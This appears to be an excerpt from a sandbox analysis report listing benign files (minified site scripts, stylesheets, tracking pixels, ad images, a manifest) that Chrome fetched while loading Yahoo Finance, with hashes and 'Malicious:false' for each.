                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as D,A as z,e as O,b as Z,d as F,f as H,j as J,i as S,B as C,U as c,k as K,l as L,G as E,v as Q,Y as M,T as R,c as W,u as X,g as v,a as w,Z as V,P as p}from"./scheduler.Dr9AAxFe.js";import{S as x,i as $,t as m,g as y,a as b,e as T,c as ee,b as ie,m as ne,d as le}from"./index.DCSmZEjO.js";import{g as te}from"./spread.CgU5AtxT.js";import{I as ae}from"./Icon.BSWt_jx8.js";import{g as I}from"./i13nUtil.C-uBpR7k.js";function P(l){let e,a;return e=new ae({props:{size:l[7]||l[6],icon:l[5],type:l[8],className:l[11]}}),{c(){ee(e.$$.fragment)},l(i){ie(e.$$.fragment,i)},m(i,s){ne(e,i,s),a=!0},p(i,s){const u={};s&192&&(u.size=i[7]||i[6]),s&32&&(u.icon=i[5]),s&256&&(u.type=i[8]),s&2048&&(u.className=i[11]),e.$set(u)},i(i){a||(m(e.$$.fragment,i),a=!0)},o(i){b(e.$$.fragment,i),a=!1},d(i){le(e,i)}}}function U(l){let e;const a=l[14].default,i=W(a,l,l[13],null);return{c(){i&&i.c()},l(s){i&&i.l(s)},m(s,u){i&&i.m(s,u),e=!0},p(s,u){i&&i.p&&(!e||u&8192)&&X(i,a,s,s[13],e?w(a,s[13],u,null):v(s[13]),nu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (830)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):831
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.216636352209242
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:JFCFnXfGKXLqdtysALYk4voFbqwuAd55VuWj:JFknXf/SYsALYhvkbum55wWj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:020FE204C0DB6FC9CDFBFEB00EF5317C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:083E74BF6D49F33EB3AB6CD9F9712D16E94FCC04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1D5F841B1E6B5323F77797CF601B1679D113BBC1B5BF1B74906E5E6B0347E60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EC51319B9E44655F5F5B7C961637E4B407AC32A530F70EB0FC812C96507EB0C73C14BA2608F3ABEC1EB277079A763E0C0B6D820AD8BCBD5FBA224BC542198E47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as x,e as u,t as h,b as S,d,f as v,h as b,i as m,j,k as _,l as g,m as E,n as $,o as k}from"../chunks/scheduler.Dr9AAxFe.js";import{S as q,i as y}from"../chunks/index.DCSmZEjO.js";import{p as C}from"../chunks/stores.DPDRpTFd.js";function H(i){var f;let t,s=i[0].status+"",r,o,n,p=((f=i[0].error)==null?void 0:f.message)+"",c;return{c(){t=u("h1"),r=h(s),o=S(),n=u("p"),c=h(p)},l(e){t=d(e,"H1",{});var a=v(t);r=b(a,s),a.forEach(m),o=j(e),n=d(e,"P",{});var l=v(n);c=b(l,p),l.forEach(m)},m(e,a){_(e,t,a),g(t,r),_(e,o,a),_(e,n,a),g(n,c)},p(e,[a]){var l;a&1&&s!==(s=e[0].status+"")&&E(r,s),a&1&&p!==(p=((l=e[0].error)==null?void 0:l.message)+"")&&E(c,p)},i:$,o:$,d(e){e&&(m(t),m(o),m(n))}}}function P(i,t,s){let r;return k(i,C,o=>s(0,r=o)),[r]}class B extends q{constructor(t){super(),y(this,t,P,H,x,{})}}export{B as component};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1607)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.390464513614985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:bPX3MdHi27g2ZrWg3P7ku5BUkRVx2CnFQQ:73MDg2UiP55TqQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4FD451D04D5037574EFB1D2B6AC16DE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C08B5172FCE92F62AAFB3D6356DF7BA997785D4A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2036EECC13ED6C3634D19A22BC1CF7FA711FA19ECBBDE7C76958CE5797B42B0B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:84BCC7F7DA009CE66485351E1A4C98F35DA5249A64BF9100A4D731DF6658B9A4FEAB56581499AF46033AF45FE4113CA15C6EE097F6A7BA80B81B3B9A3FD55D34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{e as y,d as L,r as O}from"./commonUtil.CI22_Irn.js";import{m as Q,n as F}from"./utils.QCnxU1jw.js";import{l as H}from"./initializePage.CM9yuY0O.js";import{l as j}from"./logUtil.hOue7iAU.js";const N="168x126",m=Q([N]),d={adsFrequency:5,adsImageTags:m.tags,imageTags:m.tags,spaceId:void 0,adsSectionId:void 0},f={homeNewsStream:"homeNewsStreamNeo",newsHubNewsStream:"newsHubNewsStreamNeo"};async function $(t,{isPagination:c=!1,listName:r="home-news-stream",queryRef:o="homeNewsStream",payload:S,adsEnabled:g,enableCrossModuleDedup:l=!1,offset:I=0,...p}={}){var w;const[n,[u,e,A,h]]=await Promise.all([y(t),L(["config","ncpStreams","crumb","ads"],t)]),{enableIncreaseAdsTimeout:P,i13n:T,ads:v={}}=u.getPageConfig()??{},{spaceid:E}=T||{},{adsSectionId:z}=v||{},C=O(n,"enableNeoNCPQuery"),M=!!((w=h.getConfig(n.device))!=null&&w.enableTaboolaAds);o=C&&f[o]?f[o]:o,d.spaceId=E,d.adsSectionId=z;const s=r,_={adsEnabled:g!==void 0?g:!A.isAdLite,adsSlotsEnabled:M,key:"ncp_fin",...d,listName:r,perfLab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (594)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5311
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.046822701969818
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:duegRhCpwcn4QfbE/XOZjt/r6tCrY6saTGTbAaNkYaySgoaauIfQYCSG8IrW:OhCpwcn4QfbSOttT6MU6saTGTkYaySgq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BA0777792CE6C88CB6AC61D50F5ED420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:096E3337C3EB08177FC61F058A0A43FE7CC486EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2CFC3D9F68235DCA692E8B8D70E2DE1F872D321133005C628D1306AC0D72F225
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C8D17040A8966648EE790EB91235553096BCE4050814696A6F741A8E1C7EA9233EC2CC4005C3918B507B939D3E26A812212A40B87C6CD7CB7E414A627B52D066
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cdn.taboola.com/scripts/prebid_iframe_sync.html?gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!doctype html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport". content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">. <meta http-equiv="X-UA-Compatible" content="ie=edge">. <title>Document</title>. <script type="text/javascript">."use strict";..function _slicedToArray(arr, i) { return _arrayWithHoles(arr) || _iterableToArrayLimit(arr, i) || _unsupportedIterableToArray(arr, i) || _nonIterableRest(); }.function _nonIterableRest() { throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method."); }.function _unsupportedIterableToArray(o, minLen) { if (!o) return; if (typeof o === "string") return _arrayLikeToArray(o, minLen); var n = Object.prototype.toString.call(o).slice(8, -1); if (n === "Object" && o.constructor) n = o.constructor.name; if (n === "Map" || n === "Set") return Array.from(o); i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 728x90, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2255
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.42423036513978
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:4WK1h6A1aWwh82lYSKwT3WYYjVs14T3fyJ3VYpwMGiiPmDUIeluL9F:411LvnLo3Cj84eJ3mpnbiTzluL9F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3D4FDE04AFA73E8EEBD3428F38EFF2D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:48EDC8FD40C27E340982289D1117645D38238216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C64BC40632FA695CC9D2625524E1708A17F7C331FAB12A9CC46A78EDDC362257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:36F7679A6F4E13692D0C6B54C53A5AD810E05393FFD77138AF78DF3A1162620D5AF69649D9F3D0C872BC1840880DF3C9F8F8F217533BD04EEB383F54C4E53FDB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/sadbundle/3895761895101862695/Q3FY25_AURA_AWARENESS_COMPETITIVE_GEMINI_728x90/preload.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:2349C541FCE311E98FA2B11E968BC75D" xmpMM:DocumentID="xmp.did:5535FCF5211511EA802EAD89E816F6E6" xmpMM:InstanceID="xmp.iid:5535FCF4211511EA802EAD89E816F6E6" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5d6b3509-6160-e448-a781-22791a52d304" stRef:documentID="adobe:docid:photoshop:58d301f8-fb0d-6744-b0fd-17337b2858bc"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2294)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2295
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.233334984585586
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:tGFHXJy6/1ilExJQIBlbH8kUXfVP1nEIzTNEIDLpkX/j:tGFHhdwAJxlbHVUP7/Bab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C36A3B111A74C3748409D6362393EB98
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:36C6F522000119286C08099C9AD2C1DAE4839C8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0F358A85D3732F67EE5C653BE77EC1A58FC294DAA84695D67DBCF4CB7DE1F8CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A87621DAB3369DCCDE4575EFEE7105D12C93C21659DDCC6BC3F06D785E0E3110C85CCEAD06EABF80BC61E95254F650A731E7C0FBCF475CB3F1B63640945E52F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as d,c as h,b as k,j as b,k as _,u as w,g as F,a as v,i as p,n as g,e as y,d as N,f as C,q as D}from"../chunks/scheduler.Dr9AAxFe.js";import{S as L,i as S,c,b as m,m as i,t as l,a as $,d as u}from"../chunks/index.DCSmZEjO.js";import q from"../chunks/Ads.Bxzxpy-0.js";import{D as B}from"../chunks/Dock.DnH4WZuW.js";import{F as E}from"../chunks/FeatureBarNeo.DkDKoe4s.js";import{L as M}from"../chunks/Layout.Be1EN6Zi.js";import{M as T}from"../chunks/MarketsNavBar.raoHGTxi.js";function j(n){let e,r,t;e=new E({props:{className:"no-p-b tw-mt-0"}});const o=n[0].default,s=h(o,n,n[1],null);return{c(){c(e.$$.fragment),r=k(),s&&s.c()},l(a){m(e.$$.fragment,a),r=b(a),s&&s.l(a)},m(a,f){i(e,a,f),_(a,r,f),s&&s.m(a,f),t=!0},p(a,f){s&&s.p&&(!t||f&2)&&w(s,o,a,a[1],t?v(o,a[1],f,null):F(a[1]),null)},i(a){t||(l(e.$$.fragment,a),l(s,a),t=!0)},o(a){$(e.$$.fragment,a),$(s,a),t=!1},d(a){a&&p(r),u(e,a),s&&s.d(a)}}}function A(n){let e,r;return e=new T({props:{slot:"left"}}),{c(){c(e.$$.fragment)},l(t){m(e.$
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=537082476&val=RO9hsv43VjtJegiqx3XZlggueyE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9985), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):9985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.39424531478431
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:eluv6qz171WxJIvNzJYhltvvZcvfe2U1RJAZ4UDTxZFY:PvaxJIvNzO4/FbPxZFY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E1026852C4E85D7DF641ED51990B2993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:41616AB4D20413CF3CE54A66A0CC9044E41E25A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:872722495556413DF2909833C48A7A9A8183F041700B150F222402B65E5F0307
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:47B4DED13C609E4ED227EED179FEDB2FDBF4CB91321AF0C47352FED8B8DA38282F44EA5423B778F5B90B48FDEFF3CA41083C8564B4D3114350DC1173B4A34721
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/pv/static/ms/trendingNow.yhome-atomic.c9493b0439b3a8ef64a3f6b7f532117c.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:#atomic .Ai\(c\){align-items:center}#atomic .Bd\(n\),.Bd\(n\){border:none}#atomic .Bdc\(\$srchFujiDirtySeagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull,#e0e4e9)}#atomic .Bdc\(t\){border-color:transparent}#atomic .Bdendc\(\#0057b8\)\:\:b::before{border-right-color:#0057b8}#atomic .Bdendc\(\$srchFujiHulkPants\)\:\:b::before{border-right-color:#7e1fff;border-right-color:var(--hulk-pants,#7e1fff)}#atomic .Bdbc\(\#5015b0\){border-bottom-color:#5015b0}.srchTGBlackFri .srchTGBlackFri_Bdbc\(\#000000\){border-bottom-color:#000!important}.srchTGCyberMon .srchTGCyberMon_Bdbc\(\#00873c\){border-bottom-color:#00873c!important}#atomic .Bdstartc\(\#7e1fff\){border-left-color:#7e1fff}.srchTGBlackFri .srchTGBlackFri_Bdstartc\(\#2c363f\){border-left-color:#2c363f!important}.srchTGCyberMon .srchTGCyberMon_Bdstartc\(\#009c94\){border-left-color:#009c94!important}#atomic .Bds\(s\){border-style:solid}#atomic .Bdends\(s\)\:\:b::before{border-right-style:solid}#atomic .Bdw\(1px\){border-width:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2776134368191165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:+/p3MW:2ZMW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A3A92A110A37730120B46BF626FD6AF3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6D02F7F08F67645A28F999AF4FAB1BE652B44A33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AC50A66435C9FD6B6258A705FD8CE40CEE56CCF55973C1F70B51E3AD7FB3A19A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9BF3F3F0FA4343BE8EDDE699E477A1D619DF1E6A66FBDED41CBFEFDBBD37426957A045E39F63E4CD1C3FE3E256D25CD2EC23DF325AC8608B3C6A05DC76694B23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://query1.finance.yahoo.com/v1/test/getcrumb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:ok1DLLR6Gf3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):721
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9836850609023
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:YmRcZcSgPbmRc8+tHBbZ9TR3jJeyFeTR3jvEyirTR3jZN5oTR3jZN5uH4:YmS69jmS9HTPzJeVzMLBzvmzvg4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A3475AFBE9A8CF075B8F25570F511177
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:84BF3F5610CED4D2930104EC508B14DB0A801382
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4677DC067597E18AD19929D899AEEB71997964D9E3AD1FEC38713EB18A546A09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E0D2F8B44E98393B986DF758149CDBD59E4333E0BA33B542DA2F98915A790DBDFA8D3CFF062176E2DC1D6F03821A75AA8AB296895C03FCF9E65CD8224457885F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/manifest.webmanifest
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"name":"Yahoo Finance - Business Finance, Stock Market, Quotes, News","short_name":"Yahoo Finance","start_url":"/","display":"standalone","background_color":"#2196F3","lang":"en","scope":"/","icons":[{"src":"https://s.yimg.com/cv/apiv2/default/finance/favicon-192x192.png","type":"image/png","sizes":"192x192"},{"src":"https://s.yimg.com/cv/apiv2/default/finance/favicon-300x300.png","type":"image/png","sizes":"300x300"},{"src":"https://s.yimg.com/cv/apiv2/default/finance/favicon-512x512.png","type":"image/png","sizes":"512x512"},{"src":"https://s.yimg.com/cv/apiv2/default/finance/favicon-512x512.png","type":"image/png","sizes":"512x512","purpose":"any maskable"}],"orientation":"portrait","theme_color":"#037b66"}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (49207)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):54797
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.243829478413232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:MKaXx378IxwgwMw7q9HcvflvHm1IxpttLrpylZ3n:MKaXx378IWflvHmYpttLrpaZ3n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:282C875CFF2A6FD51D4AD74F4AD3EF55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E7CAA5F44F357D7ADEDDC43869EC245DB879E52E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5E29F5D0764ADC8EB7D407A76D90762FEEAF87D327A1EAD710219EC64E12281F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:66EED898B1CBF93FA4619940438B1CDE675883CB63BE3C9A593787E729543BF65B02C4704FBB274AC09B8F00AD8C09BFB8DC2523E1B1DE18F7A8CD22CA6F63A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{v as Ee,af as De,ag as se,ah as He,E as Ge,s as b,n as z,t as Ae,h as ze,k as Le,m as Oe,i as Be}from"./scheduler.Dr9AAxFe.js";import{S as L,i as ee,c as fe,b as pe,m as me,t as Se,a as Ce,d as we}from"./index.DCSmZEjO.js";import{b as ue,w as Te,d as qe}from"./43.CtYdpA_T.js";import{I as ke}from"./Icon.BSWt_jx8.js";const Ne=/[&"<]/g,je=/[&<]/g;function Ue(e,o=!1){const t=String(e),n=o?Ne:je;n.lastIndex=0;let r="",i=0;for(;n.test(t);){const l=n.lastIndex-1,s=t[l];r+=t.substring(i,l)+(s==="&"?"&amp;":s==='"'?"&quot;":"&lt;"),i=l+1}return r+t.substring(i)}function Xe(e,o){if(!e||!e.$$render)throw new Error(`<${o}> is not a valid SSR component. You may need to review your build config to ensure that dependencies are compiled, rather than imported as pre-compiled modules. Otherwise you may need to fix a <${o}>.`);return e}let B;function Re(e){function o(t,n,r,i,l){const s=He,u={on_destroy:B,context:new Map(l||(s?s.$$.context:[])),on_mount:[],before_update:[],after_update:[],callbacks
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):39
